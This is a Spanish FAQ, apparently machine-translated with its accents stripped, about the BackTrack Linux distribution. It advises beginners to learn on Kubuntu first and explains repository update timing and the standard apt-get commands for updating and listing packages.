BackTrack es una distribucin altamente especializado, donde muchas de las tareas normales no se hace
automticamente para usted, ya que estn en una distribucin de corriente.
Nuestro mejor consejo, si usted desea comenzar usando linux con BackTrack como su primer sistema
operativo Linux, es no.
Comience por descargar una copia de Kubuntu (ya que es un sistema de base de operaciones similares a
BackTrack) de arranque en esa y te obligas a hacer todo lo que est acostumbrado a hacer sobre una base
diaria con que, preferiblemente pasar la mayor parte de su tiempo usando el comando herramientas de
lnea. Cundo y slo cuando se pueden realizar todas las tareas diarias sin tener que buscar de seguridad
de los ficheros debe mover a BackTrack.
Por favor no tome esto como nosotros diciendo que no debera utilizar la Ruta inversa, tmelo como un
consejo amistoso que te ests metiendo todo un mundo de dolor y frustracin si no est completamente
cmodo realizando la administracin de su propia mquina linux antes comenzar con Backtrack.

Acabo de descargar e instalar la ltima versin de Backtrack,


an necesito actualizar?
A pesar de que ha descargado la ltima versin de la ISO o VM, esto no significa que usted tendr los
ltimos paquetes que ofrecemos. BackTrack es desarrollado y actualizado de manera continua, y por esta
razn usted debe actualizar su instalacin de forma regular para mantenerse al da con los ltimos
paquetes, correcciones de errores y nuevas herramientas.

Cundo y con qu frecuencia se actualiza el repositorio


BackTrack con nuevos paquetes?
En general, el repo BackTrack se actualiza con los nuevos paquetes de fines de semana en un domingo
por la noche para que estn disponibles para usted en la maana del lunes.
Hay veces, sin embargo cuando nos parece que un paquete tiene que ser puesto en libertad de inmediato
en lugar de esperar hasta el prximo Domingo programado repo actualizacin. As que en estos casos la

actualizacin del repositorio puede ocurrir en cualquier momento del da o de la noche durante la semana.
Tenga en cuenta que si bien el repo se est sincronizado, no estar disponible para su descarga los
paquetes. Este proceso no toma mucho tiempo, as que ser raro que esto cause alguno de vosotros tiene
ms de un perodo muy corto de indisponibilidad.

Cmo puedo actualizar Backtrack con los nuevos paquetes?


Primero asegrese de que usted tiene una conexin a internet, a continuacin, utilice los siguientes
comandos
root @ bt: ~ # apt-get update
root @ bt: ~ # apt-get upgrade

Opcionalmente se puede ejecutar


root @ bt: ~ # apt-get update
root @ bt: ~ # apt-get dist-upgrade

Dnde puedo encontrar una lista completa de todas las


herramientas instaladas en BackTrack?
No existe tal recurso, sin embargo usted puede ver una lista de todos los paquetes instalados en el sistema
BackTrack ejecutando:
dpkg - list

Por favor recuerde que esto mostrar todos los paquetes instalados en BackTrack y no slo las
herramientas
Tambin puede buscar en el repositorio para un paquete particular de inters, ejecute el comando
siguiente:
apt-cache search <keyword de interest>

También podría gustarte